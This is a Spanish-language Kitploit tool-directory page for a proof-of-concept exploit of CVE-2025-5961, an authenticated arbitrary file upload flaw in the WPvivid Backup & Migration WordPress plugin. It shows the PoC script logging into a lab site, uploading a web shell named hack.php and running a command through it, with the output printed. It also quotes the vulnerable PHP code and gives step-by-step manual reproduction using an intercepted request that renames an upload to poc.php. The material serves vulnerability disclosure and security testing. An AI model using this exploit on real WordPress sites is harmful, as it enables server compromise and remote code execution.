Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5961 — Migración, Copia de seguridad, Staging – WPvivid Backup & Migration <= 0.9.116 - Autenticado (Administrador+) Carga Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/d0n601/cve-2025-5961
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubd0n601/cve-2025-5961

CVE-2025-5961

Migración, Copia de seguridad, Staging – WPvivid Backup & Migration <= 0.9.116 - Autenticado (Administrador+) Carga Arbitraria de Archivos

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5961

Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Subida de archivos arbitraria autenticada (Administrador+)

El plugin wpvivid-backuprestore no desinfecta los tipos de archivo de la acción wpvivid_upload_import_files, permitiendo que administradores o superiores suban archivos arbitrarios y potencialmente ejecuten código en el servidor. NOTA: Los archivos subidos solo son accesibles en instancias de WordPress que se ejecutan en el servidor web NGINX, ya que el .htaccess existente dentro de la carpeta de carga de archivos de destino impide el acceso en servidores Apache.

Exploits resumidos

  • Se proporciona un POC CVE-2025-5961.py para demostrar que un administrador sube un webshell llamado hack.php.
root@kitploit:~
 python3 ./CVE-2025-5961.py https://lab1.hacker admin password
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
ajax_nonce: e4d4bec9f0
Uploading web shell: hack.php
{"result":"success"}

Web Shell At: https://lab1.hacker/wp-content/wpvividbackups/ImportandExport/hack.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 78309sec preferred_lft 78309sec
    inet6 fd00::a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86105sec preferred_lft 14105sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:63:2d:a4:f2 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Detalles

La acción wpvivid_upload_import_files llama a la función upload_files en la línea 2210 de /wp-content/plugins/wpvivid-backuprestore/includes/class-wpvivid-export-import.php sin aplicar ninguna validación de tipo de archivo.

En la línea 2235, $file_name se establece de la siguiente manera:

root@kitploit:~
$file_name=basename(sanitize_text_field($_POST['name']));

La variable $file_name se usa luego en la línea 2246 para escribir el archivo en el sistema de archivos.

root@kitploit:~
$file_handle = fopen($path.$file_name, 'wb');

Reproducción manual

  1. Crea un archivo malicioso para pasar la validación del lado del cliente, ya que lo estamos haciendo manualmente. Introduce esto en la terminal:
root@kitploit:~
echo "<?php phpinfo(); ?>" >>  wpvivid-0000000000000_1969-04-20-00-00_export_post.zip
  1. Inicia sesión en el panel de administración y ve a la pestaña WPvivid Backup.
  2. Selecciona la opción Export & Import del menú lateral y luego selecciona la pestaña Import.
  3. Inicia Burp Suite o una herramienta similar y comienza a interceptar el tráfico.
  4. Haz clic en el botón Upload and Import y selecciona el archivo wpvivid-0000000000000_1969-04-20-00-00_export_post.zip que creamos en el paso cero. test1
  5. La primera solicitud POST contendrá algo como lo siguiente, reenvía esta solicitud:
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
...
...
...
action=wpvivid_check_import_file&file_name=wpvivid-0000000000000_1969-04-20-00-00_export_post.zip&nonce=5c83c6b97b
  1. Modifica la siguiente solicitud que contiene los datos del formulario para establecer el nombre del archivo como poc.php: test2
  2. Navega a https://THEWEBSITE.com/wp-content/wpvividbackups/ImportandExport/poc.php para ejecutar la prueba de concepto. test3
Descargar herramienta